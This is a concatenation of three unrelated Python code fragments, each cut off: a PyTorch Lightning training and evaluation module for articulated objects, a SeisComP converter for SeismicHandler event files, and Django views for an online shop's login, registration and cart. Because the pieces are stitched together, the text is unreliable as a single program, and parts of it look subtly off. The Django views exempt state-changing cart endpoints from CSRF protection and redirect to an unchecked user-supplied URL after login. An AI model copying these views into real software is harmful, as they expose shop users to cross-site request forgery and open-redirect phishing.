self.log("train/loss_joint_cls", loss_joint_cls)
self.log("train/loss_joint_param", loss_joint_param)
self.log("train/loss", loss, on_step=False, on_epoch=True, prog_bar=True)
return loss
def validation_step(self, data, batch_idx):
(
logits_occ,
logits_seg,
logits_joint_type,
joint_param_revolute,
joint_param_prismatic,
) = self(data["pc_start"], data["pc_end"], data["p_occ"], data["p_seg"])
joint_label = data["joint_type"].unsqueeze(-1).repeat(1, data["p_seg"].size(1))
loss_occ = self.cri_cls(logits_occ, data["occ_label"].float())
loss_seg = self.cri_cls(logits_seg, data["seg_label"].float())
loss_joint_cls = self.cri_cls(logits_joint_type, joint_label.float())
joint_p_axis = joint_param_prismatic[:, :, :3]
joint_p_t = joint_param_prismatic[:, :, 3]
joint_r_axis = joint_param_revolute[:, :, :3]
joint_r_t = joint_param_revolute[:, :, 3]
joint_r_p2l_vec = joint_param_revolute[:, :, 4:7]
joint_r_p2l_dist = joint_param_revolute[:, :, 7]
gt_t = data["state_end"] - data["state_start"]
loss_prismatic, prismatic_result_dict = self.cri_joint_p(
data["seg_label"].float(),
joint_p_axis,
joint_p_t,
data["screw_axis"],
gt_t,
)
loss_revolute, revolute_result_dict = self.cri_joint_r(
data["p_seg"],
data["seg_label"].float(),
joint_r_axis,
joint_r_t,
joint_r_p2l_vec,
joint_r_p2l_dist,
data["screw_axis"],
gt_t,
data["p2l_vec"],
data["p2l_dist"],
)
mask_reg = F.one_hot(data["joint_type"].long(), num_classes=2)
loss_joint_param = (
torch.stack((loss_revolute, loss_prismatic), dim=1) * mask_reg
)
loss_joint_param = loss_joint_param.sum(-1).mean()
loss = (
self.hparams.loss_weight_occ * loss_occ
+ self.hparams.loss_weight_seg * loss_seg
+ self.hparams.loss_weight_joint_type * loss_joint_cls
+ self.hparams.loss_weight_joint_param * loss_joint_param
)
# loss = loss_occ
self.log("val/loss_occ", loss_occ)
self.log("val/loss_seg", loss_seg)
self.log("val/loss_joint_cls", loss_joint_cls)
self.log("val/loss_joint_param", loss_joint_param)
self.log("val/loss", loss, on_step=False, on_epoch=True, prog_bar=True)
prob_occ = torch.sigmoid(logits_occ)
prob_seg = torch.sigmoid(logits_seg)
self.occ_pr_meter.update(prob_occ, data["occ_label"].long())
self.occ_rc_meter.update(prob_occ, data["occ_label"].long())
self.seg_pr_meter.update(prob_seg, data["seg_label"].long())
self.seg_rc_meter.update(prob_seg, data["seg_label"].long())
occ_and = torch.logical_and(
(prob_occ > self.hparams.test_occ_th), data["occ_label"].bool()
)
occ_or = torch.logical_or(
(prob_occ > self.hparams.test_occ_th), data["occ_label"].bool()
)
occ_iou = occ_and.float().sum(-1) / occ_or.float().sum(-1)
seg_and = torch.logical_and(
(prob_seg > self.hparams.test_seg_th), data["seg_label"].bool()
)
seg_or = torch.logical_or(
(prob_seg > self.hparams.test_seg_th), data["seg_label"].bool()
)
seg_iou = seg_and.float().sum(-1) / seg_or.float().sum(-1)
self.occ_iou_meter.update(occ_iou)
self.seg_iou_meter.update(seg_iou)
if data["joint_type"].item() == 0: # revoluted
self.revoluted_axis_ori_meter.update(revolute_result_dict["axis_ori"])
if self.hparams["r_cos_ambiguity"]:
config_error = torch.minimum(
(gt_t - joint_r_t).abs(), (gt_t + joint_r_t).abs()
)
else:
config_error = (gt_t - joint_r_t).abs()
self.revoluted_degree_meter.update((config_error).abs())
self.revoluted_p2l_ori_meter.update(revolute_result_dict["p2l_ori"])
self.revoluted_p2l_dist_meter.update(revolute_result_dict["p2l_dist"])
self.revoluted_displacement_meter.update(
revolute_result_dict["displacement"]
)
elif data["joint_type"].item() == 1: # prismatic
self.prismatic_axis_ori_meter.update(prismatic_result_dict["axis_ori"])
if self.hparams["p_cos_ambiguity"]:
config_error = torch.minimum(
(gt_t - joint_p_t).abs(), (gt_t + joint_p_t).abs()
)
else:
config_error = (gt_t - joint_p_t).abs()
self.revoluted_degree_meter.update((config_error).abs())
self.prismatic_offset_meter.update((gt_t - joint_p_t).abs())
return loss
def log_meter(self, meter, name):
val = meter.compute()
meter.reset()
self.log(f"val/{name}", val)
def validation_epoch_end(self, val_step_outputs):
self.log_meter(self.occ_pr_meter, "occ_precision")
self.log_meter(self.occ_rc_meter, "occ_recall")
self.log_meter(self.seg_pr_meter, "seg_precision")
self.log_meter(self.seg_rc_meter, "seg_recall")
self.log_meter(self.occ_iou_meter, "occ_iou")
self.log_meter(self.seg_iou_meter, "seg_iou")
self.log_meter(self.revoluted_axis_ori_meter, "revoluted_axis_ori")
self.log_meter(self.revoluted_degree_meter, "revoluted_degree")
self.log_meter(self.revoluted_p2l_ori_meter, "revoluted_p2l_ori")
self.log_meter(self.revoluted_p2l_dist_meter, "revoluted_p2l_dist")
self.log_meter(self.revoluted_displacement_meter, "revoluted_displacement")
self.log_meter(self.prismatic_axis_ori_meter, "prismatic_axis_ori")
self.log_meter(self.prismatic_offset_meter, "prismatic_offset")
def test_step(self, data, batch_idx):
save_dir = f"results/{batch_idx:04d}/"
os.makedirs(save_dir)
def normalize(tensor: torch.Tensor, dim: int) -> torch.Tensor:
return tensor / ((tensor ** 2).sum(dim, keepdim=True).sqrt() + 1.0e-5)
# only support batch size 1
assert data["pc_start"].size(0) == 1
mesh_pose_dict = np.load(data["data_path"][0], allow_pickle=True)[
"start_mesh_pose_dict"
].item()
if not hasattr(self, "generator"):
self.generator = Generator3D(
self.model,
device=self.device,
threshold=self.hparams.test_occ_th,
seg_threshold=self.hparams.test_seg_th,
input_type="pointcloud",
refinement_step=0,
padding=0.1,
resolution0=self.hparams.test_res,
)
# evaluate mesh
mesh_dict, mobile_points_all, c, _ = self.generator.generate_mesh(data)
gt_mesh_dict = get_gt_mesh_from_data(data, mesh_pose_dict)
cd_whole = (
compute_trimesh_chamfer(
as_mesh(trimesh.Scene(mesh_dict.values())),
as_mesh(trimesh.Scene(gt_mesh_dict.values())),
0,
1,
)
* 1000
)
cd_mobile = compute_trimesh_chamfer(mesh_dict[1], gt_mesh_dict[1], 0, 1) * 1000
if np.isnan(cd_mobile) or np.isnan(cd_whole):
write_urdf = False
else:
write_urdf = True
static_part_simp = mesh_dict[0].simplify_quadratic_decimation(10000)
mobile_part_simp = mesh_dict[1].simplify_quadratic_decimation(10000)
mobile_part_simp.visual.face_colors = np.array(
[84, 220, 83, 255], dtype=np.uint8
)
_ = static_part_simp.export(os.path.join(save_dir, "static.obj"))
_ = mobile_part_simp.export(os.path.join(save_dir, "mobile.obj"))
bounds = as_mesh(trimesh.Scene(mesh_dict.values())).bounds
bbox_dict = {"min": list(bounds[0]), "max": list(bounds[1])}
with open(os.path.join(save_dir, "bounding_box.json"), "w") as f:
json.dump(bbox_dict, f)
c = self.model.encode_inputs(data["pc_start"], data["pc_end"])
mesh_dict = None
result = {
"geo": {
"cd_whole": cd_whole,
"cd_mobile": cd_mobile,
},
}
if mobile_points_all.size(1) == 0:
return result
(
logits_joint_type,
joint_param_revolute,
joint_param_prismatic,
) = self.model.decode_joints(mobile_points_all, c)
# articulation evaluation
joint_type_prob = logits_joint_type.sigmoid().mean()
correct = (joint_type_prob > 0.5).long().item() == data["joint_type"][
0
].long().item()
# revolute
if data["joint_type"][0].item() == 0:
gt_t = (data["state_end"] - data["state_start"]).cpu()[0].numpy()
gt_axis = data["screw_axis"].cpu()[0].numpy()
gt_pivot_point = data["p_seg"] + data["p2l_vec"] * data[
"p2l_dist"
].unsqueeze(-1)
gt_pivot_point = gt_pivot_point[0].mean(0).cpu().numpy()
# axis voting
joint_r_axis = (
normalize(joint_param_revolute[:, :, :3], -1)[0].cpu().numpy()
)
joint_r_t = joint_param_revolute[:, :, 3][0].cpu().numpy()
joint_r_p2l_vec = (
normalize(joint_param_revolute[:, :, 4:7], -1)[0].cpu().numpy()
)
joint_r_p2l_dist = joint_param_revolute[:, :, 7][0].cpu().numpy()
p_seg = mobile_points_all[0].cpu().numpy()
pivot_point = p_seg + joint_r_p2l_vec * joint_r_p2l_dist[:, np.newaxis]
(
joint_axis_pred,
pivot_point_pred,
config_pred,
) = aggregate_dense_prediction_r(
joint_r_axis, pivot_point, joint_r_t, method="mean"
)
axis_ori_err, axis_displacement, config_err = eval_joint_r(
(joint_axis_pred, pivot_point_pred, config_pred),
(gt_axis, gt_pivot_point, gt_t),
)
result["articulation"] = {
"revolute": {
"axis_orientation": axis_ori_err,
"axis_displacement": axis_displacement,
"config_err": config_err,
},
"prismatic": None,
"joint_type": {"accuracy": correct},
}
# prismatic
else:
gt_t = (data["state_end"] - data["state_start"]).cpu()[0].numpy()
gt_axis = data["screw_axis"].cpu()[0].numpy()
gt_pivot_point = np.zeros(3)
pivot_point_pred = np.zeros(3)
# axis voting
joint_p_axis = (
normalize(joint_param_prismatic[:, :, :3], -1)[0].cpu().numpy()
)
joint_axis_pred = joint_p_axis.mean(0)
joint_p_t = joint_param_prismatic[:, :, 3][0].cpu().numpy()
config_pred = joint_p_t.mean()
axis_ori_err, config_err = eval_joint_p(
(joint_axis_pred, config_pred), (gt_axis, gt_t)
)
result["articulation"] = {
"prismatic": {
"axis_orientation": axis_ori_err,
"config_err": config_err,
},
"revolute": None,
"joint_type": {"accuracy": correct},
}
# write result URDF
if write_urdf:
root_dir = os.path.abspath(
os.path.join(
__file__,
os.path.pardir,
os.path.pardir,
os.path.pardir,
)
)
with open(os.path.join(root_dir, "template.urdf")) as f:
urdf_txt = f.read()
if joint_type_prob.item() < 0.5:
joint_type = "revolute"
else:
joint_type = "prismatic"
urdf_txt = urdf_txt.replace("joint_type", joint_type)
joint_position_r_txt = " ".join([str(x) for x in -pivot_point_pred])
urdf_txt = urdf_txt.replace("joint_position_r", joint_position_r_txt)
joint_position_txt = " ".join([str(x) for x in pivot_point_pred])
urdf_txt = urdf_txt.replace("joint_position", joint_position_txt)
joint_axis_txt = " ".join([str(x) for x in joint_axis_pred])
urdf_txt = urdf_txt.replace("joint_axis", joint_axis_txt)
if config_pred > 0:
urdf_txt = urdf_txt.replace("joint_state_lower", "0.0")
urdf_txt = urdf_txt.replace("joint_state_upper", str(config_pred))
else:
urdf_txt = urdf_txt.replace("joint_state_upper", "0.0")
urdf_txt = urdf_txt.replace("joint_state_lower", str(config_pred))
with open(os.path.join(save_dir, "out.urdf"), "w") as f:
f.write(urdf_txt)
object_data = (
{
"data_path": data["data_path"][0],
"center": data["center"][0].cpu().numpy(),
"scale": data["scale"].item(),
"joint_index": data["joint_index"].item(),
"joint_axis": gt_axis,
"pivot_point": gt_pivot_point,
"config": gt_t,
},
)
output = {
"joint_axis": joint_axis_pred,
"pivot_point": pivot_point_pred,
"config": config_pred,
"joint_type": (joint_type_prob > 0.5).long().item(),
}
np.savez_compressed(
os.path.join(save_dir, "quant.npz"),
eval=result,
output=output,
data=object_data,
)
return result
def test_epoch_end(self, outputs) -> None:
# outputs = self.all_gather(outputs)
results_all = {
"geo": {
"cd_whole": [],
"cd_mobile": [],
},
"articulation": {
"revolute": {
"axis_orientation": [],
"axis_displacement": [],
"config_err": [],
},
"prismatic": {"axis_orientation": [], "config_err": []},
"joint_type": {"accuracy": []},
},
}
for result in outputs:
for k, v in result["geo"].items():
if isinstance(v, torch.Tensor):
v = v.cpu().numpy()
results_all["geo"][k].append(v)
for k, v in result["articulation"].items():
if v is None:
continue
for k2, v2 in v.items():
if isinstance(v2, torch.Tensor):
v2 = v2.cpu().numpy()
results_all["articulation"][k][k2].append(v2)
results_mean = deepcopy(results_all)
for k, v in results_all["geo"].items():
tmp = np.array(v).reshape(-1)
tmp = np.mean([x for x in tmp if not np.isnan(x)])
results_mean["geo"][k] = float(tmp)
for k, v in results_all["articulation"].items():
for k2, v2 in v.items():
tmp = np.array(v2).reshape(-1)
tmp = np.mean([x for x in tmp if not np.isnan(x)])
results_mean["articulation"][k][k2] = float(tmp)
if self.trainer.is_global_zero:
pprint(results_mean)
utils.save_results(results_mean)
log.info(f"Saved results to {os.getcwd()}")
return
def configure_optimizers(self):
optimizer = torch.optim.Adam(
self.parameters(),
lr=self.hparams.learning_rate,
weight_decay=self.hparams.weight_decay,
)
lr_scheduler = torch.optim.lr_scheduler.ExponentialLR(
optimizer, self.hparams.lr_decay_gamma
)
lr_dict = {
"scheduler": lr_scheduler,
"interval": "epoch",
"frequency": self.hparams.lr_decay_freq,
}
return | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (C) 2017 by gempa GmbH #
# #
# You can redistribute and/or modify this program under the #
# terms of the SeisComP Public License. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# SeisComP Public License for more details. #
# #
# Author: <NAME>, <NAME> #
# Email: <EMAIL> #
# #
# Converts SeismicHandler (http://www.seismic-handler.org/) event data to #
# SeisComP3. Data is read from input file or stdin if no input file is #
# specified. The result is available on stdout. #
# #
# seiscomp exec sh2proc shm.evt > sc3.xml #
# #
# Since SeismicHandler only specifies station and component codes, a #
# mapping to SeisComP3 network, location and channel codes is necessary. #
# The script assumes that the same station code is not used in different #
# networks. In case an ambiguous id is found a warning is printed and the #
# first network code is used. The channel and stream code is extracted #
# from the dectecStream and detecLocid configured in the global binding. #
# In case no configuration module is available the first location and #
# stream is used. #
###############################################################################
from seiscomp3 import Client, Core, DataModel, IO, Logging
from time import strptime
import sys, traceback
TimeFormats = [
'%d-%b-%Y_%H:%M:%S.%f',
'%d-%b-%Y_%H:%M:%S'
]
def wfs2Str(wfsID):
return '%s.%s.%s.%s' % (wfsID.networkCode(), wfsID.stationCode(),
wfsID.locationCode(), wfsID.channelCode())
###############################################################################
class SH2Proc(Client.Application):
###########################################################################
def __init__(self):
Client.Application.__init__(self, len(sys.argv), sys.argv)
self.setMessagingEnabled(True)
self.setDatabaseEnabled(True, True)
self.setLoadInventoryEnabled(True)
self.setLoadConfigModuleEnabled(True)
self.setDaemonEnabled(False)
self.inputFile = '-'
###########################################################################
def initConfiguration(self):
if not Client.Application.initConfiguration(self):
return False
# If the database connection is passed via command line or configuration
# file then messaging is disabled. Messaging is only used to get
# the configured database connection URI.
if self.databaseURI() != '':
self.setMessagingEnabled(False)
else:
# A database connection is not required if the inventory is loaded
# from file
if not self.isInventoryDatabaseEnabled():
self.setMessagingEnabled(False)
self.setDatabaseEnabled(False, False)
return True
###########################################################################
def validateParameters(self):
if not Client.Application.validateParameters(self):
return False
for opt in self.commandline().unrecognizedOptions():
if len(opt) > 1 and opt.startswith('-'):
continue
self.inputFile = opt
break
return True
###########################################################################
def loadStreams(self):
now = Core.Time.GMT()
inv = Client.Inventory.Instance()
self.streams = {}
# try to load streams by detecLocid and detecStream
mod = self.configModule()
if mod is not None and mod.configStationCount() > 0:
Logging.info('loading streams using detecLocid and detecStream')
for i in range(mod.configStationCount()):
cfg = mod.configStation(i)
net = cfg.networkCode()
sta = cfg.stationCode()
if self.streams.has_key(sta):
Logging.warning('ambiguous stream id found for station ' \
'%s.%s' % (net, sta))
continue
setup = DataModel.findSetup(cfg, self.name(), True)
if not setup:
Logging.warning('could not find station setup for %s.%s' % (
net, sta))
continue
params = DataModel.ParameterSet.Find(setup.parameterSetID())
if not params:
Logging.warning('could not find station parameters for ' \
'%s.%s' % (net, sta))
continue
detecLocid = ''
detecStream = None
for j in xrange(params.parameterCount()):
param = params.parameter(j)
if param.name() == 'detecStream':
detecStream = param.value()
elif param.name() == 'detecLocid':
detecLocid = param.value()
if detecStream is None:
Logging.warning('could not find detecStream for %s.%s' % (
net, sta))
continue
loc = inv.getSensorLocation(net, sta, detecLocid, now)
if loc is None:
Logging.warning('could not find preferred location for ' \
'%s.%s' % (net, sta))
continue
components = {}
tc = DataModel.ThreeComponents()
DataModel.getThreeComponents(tc, loc, detecStream[:2], now)
if tc.vertical():
cha = tc.vertical()
wfsID = DataModel.WaveformStreamID(net, sta, loc.code(),
cha.code(), '')
components[cha.code()[-1]] = wfsID
Logging.debug('add stream %s (vertical)' % wfs2Str(wfsID))
if tc.firstHorizontal():
cha = tc.firstHorizontal()
wfsID = DataModel.WaveformStreamID(net, sta, loc.code(),
cha.code(), '')
components[cha.code()[-1]] = wfsID
Logging.debug('add stream %s (first horizontal)' % wfs2Str(wfsID))
if tc.secondHorizontal():
cha = tc.secondHorizontal()
wfsID = DataModel.WaveformStreamID(net, sta, loc.code(),
cha.code(), '')
components[cha.code()[-1]] = wfsID
Logging.debug('add stream %s (second horizontal)' % wfs2Str(wfsID))
if len(components) > 0:
self.streams[sta] = components
return
# fallback loading streams from inventory
Logging.warning('no configuration module available, loading streams ' \
'from inventory and selecting first available stream ' \
'matching epoch')
for iNet in xrange(inv.inventory().networkCount()):
net = inv.inventory().network(iNet)
Logging.debug('network %s: loaded %i stations' % (
net.code(), net.stationCount()))
for iSta in xrange(net.stationCount()):
sta = net.station(iSta)
try:
start = sta.start()
if not start <= now:
continue
except:
continue
try:
end = sta.end()
if not now <= end:
continue
except:
pass
for iLoc in xrange(sta.sensorLocationCount()):
loc = sta.sensorLocation(iLoc)
for iCha in range(loc.streamCount()):
cha = loc.stream(iCha)
wfsID = DataModel.WaveformStreamID(net.code(),
sta.code(), loc.code(), cha.code(), '')
comp = cha.code()[2]
if not self.streams.has_key(sta.code()):
components = {}
components[comp] = wfsID
self.streams[sta.code()] = components
else:
# Seismic Handler does not support network,
# location and channel code: make sure network and
# location codes match first item in station
# specific steam list
oldWfsID = self.streams[sta.code()].values()[0]
if net.code() != oldWfsID.networkCode() or \
loc.code() != oldWfsID.locationCode() or \
cha.code()[:2] != oldWfsID.channelCode()[:2]:
Logging.warning('ambiguous stream id found ' \
'for station %s, ignoring %s' \
% (sta.code(), wfs2Str(wfsID)))
continue
self.streams[sta.code()][comp] = wfsID
Logging.debug('add stream %s' % wfs2Str(wfsID))
###########################################################################
def parseTime(self, timeStr):
time = Core.Time()
for fmt in TimeFormats:
if time.fromString(timeStr, fmt):
break
return time
###########################################################################
def parseMagType(self, value):
if value == 'm':
return 'M'
elif value == 'ml':
return 'ML'
elif value == 'mb':
return 'Mb'
elif value == 'ms':
return 'MS'
elif value == 'mw':
return 'Mw'
return ''
###########################################################################
def sh2proc(self, file):
ep = DataModel.EventParameters()
magnitude = DataModel.Magnitude.Create()
origin = DataModel.Origin.Create()
origin.setCreationInfo(DataModel.CreationInfo())
origin.creationInfo().setCreationTime(Core.Time.GMT())
originQuality = None
originCE = None
latFound = False
lonFound = False
depthError = None
originComments = {}
# phase variables, reset after 'end of phase'
pick = None
stationMag = None
staCode = None
compCode = None
# read file line by line, split key and value at colon
iLine = 0
for line in file:
iLine += 1
a = line.split(':', 1)
key = a[0].strip()
keyLower = key.lower()
value = None
# empty line
if len(keyLower) == 0:
continue
# end of phase
elif keyLower == '--- end of phase ---':
if pick is None:
Logging.warning('Line %i: found empty phase block' % iLine)
continue
if staCode is None or compCode is None:
Logging.warning('Line %i: end of phase, stream code ' \
'incomplete' % iLine)
continue
if not self.streams.has_key(staCode):
Logging.warning('Line %i: end of phase, station code %s ' \
'not found in inventory' % (iLine, staCode))
continue
if not self.streams[staCode].has_key(compCode):
Logging.warning('Line %i: end of phase, component %s of ' \
'station %s not found in inventory' % (
iLine, compCode, staCode))
continue
streamID = self.streams[staCode][compCode]
pick.setWaveformID(streamID)
ep.add(pick)
arrival.setPickID(pick.publicID())
origin.add(arrival)
amplitude.setPickID(pick.publicID())
ep.add(amplitude)
if stationMag is not None:
stationMag.setWaveformID(streamID)
origin.add(stationMag)
stationMagContrib = DataModel.StationMagnitudeContribution()
stationMagContrib.setStationMagnitudeID(stationMag.publicID())
magnitude.add(stationMagContrib)
pick = None
staCode = None
compCode = None
stationMag = None
continue
# empty key
elif len(a) == 1:
Logging.warning('Line %i: key without value' % iLine)
continue
value = a[1].strip()
if pick is None:
pick = DataModel.Pick.Create()
arrival = DataModel.Arrival()
amplitude = DataModel.Amplitude.Create()
try:
##############################################################
# station parameters
# station code
if keyLower == 'station code':
staCode = value
# pick time
elif keyLower == 'onset time':
pick.setTime(DataModel.TimeQuantity(self.parseTime(value)))
# pick onset type
elif keyLower == 'onset type':
found = False
for onset in [ DataModel.EMERGENT, DataModel.IMPULSIVE,
DataModel.QUESTIONABLE ]:
if value == DataModel.EPickOnsetNames_name(onset):
pick.setOnset(onset)
found = True
break;
if not found:
raise Exception('Unsupported onset value')
# phase code
elif keyLower == 'phase name':
phase = DataModel.Phase()
phase.setCode(value)
pick.setPhaseHint(phase)
arrival.setPhase(phase)
# event type, added as origin comment later on
elif keyLower == 'event type':
originComments[key] = value
# filter ID
elif keyLower == 'applied filter':
pick.setFilterID(value)
# channel code, prepended by configured Channel prefix if only
# one character is found
elif keyLower == 'component':
compCode = value
# pick evaluation mode
elif keyLower == 'pick type':
found = False
for mode in [ DataModel.AUTOMATIC, DataModel.MANUAL ]:
if value == DataModel.EEvaluationModeNames_name(mode):
pick.setEvaluationMode(mode)
found = True
break;
if not found:
raise Exception('Unsupported evaluation mode value')
# arrival weight
elif keyLower == 'weight':
arrival.setWeight(float(value))
# arrival azimuth
elif keyLower == 'theo. azimuth (deg)':
arrival.setAzimuth(float(value))
# arrival backazimuth
elif keyLower == 'theo. backazimuth (deg)':
pick.setBackazimuth(DataModel.RealQuantity(float(value)))
# arrival distance
elif keyLower == 'distance (deg)':
arrival.setDistance(float(value))
# ignored
elif keyLower == 'distance (km)':
Logging.debug('Line %i: ignoring parameter: %s' % (
iLine, key))
# arrival time residual
elif keyLower == 'residual time':
arrival.setTimeResidual(float(value))
# ignored
elif keyLower == 'quality number':
Logging.debug('Line %i: ignoring parameter: %s' % (
iLine, key))
# station magnitude value and type
elif keyLower.startswith('magnitude '):
stationMag = DataModel.StationMagnitude.Create()
stationMag.setAmplitudeID(amplitude.publicID())
stationMag.setMagnitude(DataModel.RealQuantity(float(value)))
magType = self.parseMagType(key[10:])
if len(magType) > 0:
stationMag.setType(magType)
amplitude.setType(magType)
###############################################################
# origin parameters
# event ID, added as origin comment later on
elif keyLower == 'event id':
originComments[key] = value
# magnitude value and type
elif keyLower.startswith('mean magnitude '):
magnitude.setMagnitude(DataModel.RealQuantity(float(value)))
magType = self.parseMagType(key[15:])
if len(magType) > 0:
magnitude.setType(magType)
# latitude
elif keyLower == 'latitude':
origin.latitude().setValue(float(value))
latFound = True
elif keyLower == 'error in latitude (km)':
origin.latitude().setUncertainty(float(value))
# longitude
elif keyLower == 'longitude':
origin.longitude().setValue(float(value))
lonFound = True
elif keyLower == 'error in longitude (km)':
origin.longitude().setUncertainty(float(value))
# depth
elif keyLower == 'depth (km)':
origin.setDepth(DataModel.RealQuantity(float(value)))
if depthError is not None:
origin.depth().setUncertainty(depthError)
elif keyLower == 'depth type':
Logging.debug('Line %i: ignoring parameter: %s' % (
iLine, key))
elif keyLower == 'error in depth (km)':
depthError = float(value)
try: origin.depth().setUncertainty(depthError)
except Core.ValueException: pass
# time
elif keyLower == 'origin time':
origin.time().setValue(self.parseTime(value))
elif keyLower == 'error in origin time':
origin.time().setUncertainty(float(value))
# region table, added as origin comment later on
elif keyLower == 'region table':
originComments[key] = value
# region table, added as origin comment later on
elif keyLower == 'region id':
originComments[key] = value
# source region, added as origin comment later on
elif keyLower == 'source region':
originComments[key] = value
# used station count
elif keyLower == 'no. of stations used':
if originQuality is None:
originQuality = DataModel.OriginQuality()
originQuality.setUsedStationCount(int(value))
# ignored
elif keyLower == 'reference location name':
Logging.debug('Line %i: ignoring parameter: %s' % (
iLine, key))
# confidence ellipsoid major axis
elif keyLower == 'error ellipse major':
if originCE is None:
originCE = DataModel.ConfidenceEllipsoid()
originCE.setSemiMajorAxisLength(float(value))
# confidence ellipsoid minor axis
elif keyLower == 'error ellipse minor':
if originCE is None:
originCE = DataModel.ConfidenceEllipsoid()
originCE.setSemiMinorAxisLength(float(value))
# confidence ellipsoid rotation
elif keyLower == 'error ellipse strike':
if originCE is None:
originCE = DataModel.ConfidenceEllipsoid()
originCE.setMajorAxisRotation(float(value))
# azimuthal gap
elif keyLower == 'max azimuthal gap (deg)':
if originQuality is None:
originQuality = DataModel.OriginQuality()
originQuality.setAzimuthalGap(float(value))
# creation info author
elif keyLower == 'author':
origin.creationInfo().setAuthor(value)
# creation info agency
elif keyLower == 'agency':
origin.creationInfo().setAgencyID(value)
# earth model id
elif keyLower == 'velocity model':
origin.setEarthModelID(value)
# standard error
elif keyLower | |
= True
shipping_address.zip_code = form.cleaned_data['zip_code']
shipping_address.address = form.cleaned_data['address']
shipping_address.city = form.cleaned_data['city']
shipping_address.state = form.cleaned_data['state']
shipping_address.save()
msg = 'Your shipping address has been updated'
return redirect('/shipping-address/{}/?msg={}'.format(request.POST['shipping_address_num'], msg))
msg = 'some information you provided is incorrect'
return redirect('/shipping-address/{}/?msg={}'.format(request.POST['shipping_address_num'], msg))
# AUTH
def handle_login(request):
if request.user.is_authenticated:
return redirect('/')
form = LoginForm(request.POST or None)
if form.is_valid():
user = authenticate(username=form.cleaned_data['email'], password=form.cleaned_data['password'])
if user is not None:
login(request, user)
if request.session.get('cart'):
cart = request.session['cart']
for cart_item in cart:
if not Cart.objects.filter(user=user, product_id=cart_item['product_id']).exists():
cart_item = Cart(user=user, product_id=cart_item['product_id'],quantity=cart_item['quantity'])
cart_item.save()
return redirect(request.POST['redirect_url'])
context = {'form': form}
context['cart_count'] = len(get_cart(request))
context['bg_img'] = bg_img()
return render(request, 'registration/login.html', context)
def handle_register(request):
if request.user.is_authenticated:
return redirect('/')
form = RegisterForm(request.POST or None)
if form.is_valid():
username = form.cleaned_data['username'].lower()
email = form.cleaned_data['email'].lower()
user = user = User(username=username, email=email)
user.set_password(form.cleaned_data['password'])
user.save()
# send user account verification email
subject = 'Verify Your Tetris Account'
message = ''
from_email = settings.DEFAULT_FROM_EMAIL or 'Tetris Retails <<EMAIL>>'
recipient_list = (user.email, )
html_message = loader.render_to_string(
'emails/account_verification_email.html', {'user': user,'request':request},
)
send_mail(subject, message, from_email, recipient_list, fail_silently=True, html_message=html_message)
user = authenticate(username=user.email, password=form.cleaned_data.get('password'))
if user is not None:
login(request, user)
if request.session.get('cart'):
cart = request.session['cart']
for cart_item in cart:
cart_item = Cart(user=user, product_id=cart_item['product_id'],quantity=cart_item['quantity'])
cart_item.save()
return redirect(request.POST['redirect_url'])
context = {'form': form}
context['cart_count'] = len(get_cart(request))
context['bg_img'] = bg_img()
return render(request, 'registration/register.html', context)
@login_required(login_url='/login/')
def handle_logout(request):
logout(request)
return redirect('/login')
class PasswordChangeViewMod(PasswordChangeView):
def get_context_data(self, **kwargs):
context = super(PasswordChangeView, self).get_context_data(**kwargs)
context['bg_img'] = bg_img()
return context
# AJAX CALLS
@csrf_exempt
def add_to_cart(request):
if request.session.get('cart'):
cart = request.session['cart']
cart.append({'product_id':request.POST['product_id'], 'quantity':request.POST['quantity']})
request.session['cart'] = cart
else:
request.session['cart'] = [{'product_id':request.POST['product_id'], 'quantity':request.POST['quantity']}]
if request.user.is_authenticated:
cart_item = Cart(user=request.user, product_id=request.POST['product_id'], quantity=request.POST['quantity'])
cart_item.save()
response = JsonResponse({'status' : 'success', 'msg': 'added successfully' })
response.status_code = 200
return response
response = JsonResponse({'status' : 'success', 'msg': 'added successfully' })
response.status_code = 200
return response
@csrf_exempt
def change_cart_item_qty(request):
if int(request.POST['new_quantity']) < 1:
response = JsonResponse({'status' : 'error', 'msg': 'quantity less than 0' })
response.status_code = 422
return response
if request.session.get('cart'):
product_id = request.POST['product_id']
cart = request.session.get('cart')
for cart_item in cart:
if cart_item['product_id'] == product_id:
cart_item['quantity'] = request.POST['new_quantity']
break
request.session['cart'] = cart
if request.user.is_authenticated:
cart_item = Cart.objects.filter(user=request.user, product_id=request.POST['product_id']).first()
if cart_item:
cart_item.quantity = request.POST['new_quantity']
cart_item.save()
response = JsonResponse({'status' : 'success', 'msg': 'quantity changed successfully' })
response.status_code = 200
return response
else:
cart_item = Cart(user=request.user, product_id=request.POST['product_id'], quantity=request.POST['new_quantity'])
cart_item.save()
response = JsonResponse({'status' : 'success', 'msg': 'quantity changed successfully' })
response.status_code = 200
return response
@csrf_exempt
def remove_from_cart(request):
if request.session.get('cart') and request.POST.get('product_id'):
product_id = request.POST['product_id']
cart = request.session.get('cart')
for cart_item in cart:
if cart_item['product_id'] == product_id:
cart.remove(cart_item)
break
request.session['cart'] = cart
if request.user.is_authenticated and request.POST.get('product_id'):
cart_item = Cart.objects.filter(user=request.user, product_id=request.POST['product_id']).first()
if cart_item:
cart_item.delete()
response = JsonResponse({'status' : 'success', 'msg': 'removed successfully' })
response.status_code = 200
return response
response = JsonResponse({'status' : 'success', 'msg': 'removed successfully' })
response.status_code = 200
return response
@csrf_exempt
@login_required(login_url='/login/')
def add_to_wish_list(request):
wish_item = Wish(user=request.user, product_id=request.POST['product_id'])
if wish_item:
wish_item.save()
response = JsonResponse({'status' : 'success', 'msg': 'added successfully' })
response.status_code = 200
return response
response = JsonResponse({'status' : 'error', 'msg': 'error occured, please try again later.' })
response.status_code = 422
return response
@csrf_exempt
@login_required(login_url='/login/')
def remove_from_wish_list(request):
wish_item = Wish.objects.filter(user=request.user, product_id=request.POST['product_id']).first()
if wish_item:
wish_item.delete()
response = JsonResponse({'status' : 'success', 'msg': 'removed successfully' })
response.status_code = 200
return response
response = JsonResponse({'status' : 'error', 'msg': 'error occured, please try again later.' })
response.status_code = 422
return response
@csrf_exempt
def empty_cart(request):
if request.session.get('cart'):
request.session['cart'] = []
if request.user.is_authenticated:
cart = Cart.objects.filter(user=request.user)
cart.delete()
response = JsonResponse({'status' : 'success', 'msg': 'cart emptied' })
response.status_code = 200
return response
response = JsonResponse({'status' : 'success', 'msg': 'cart emptied' })
response.status_code = 200
return response
@csrf_exempt
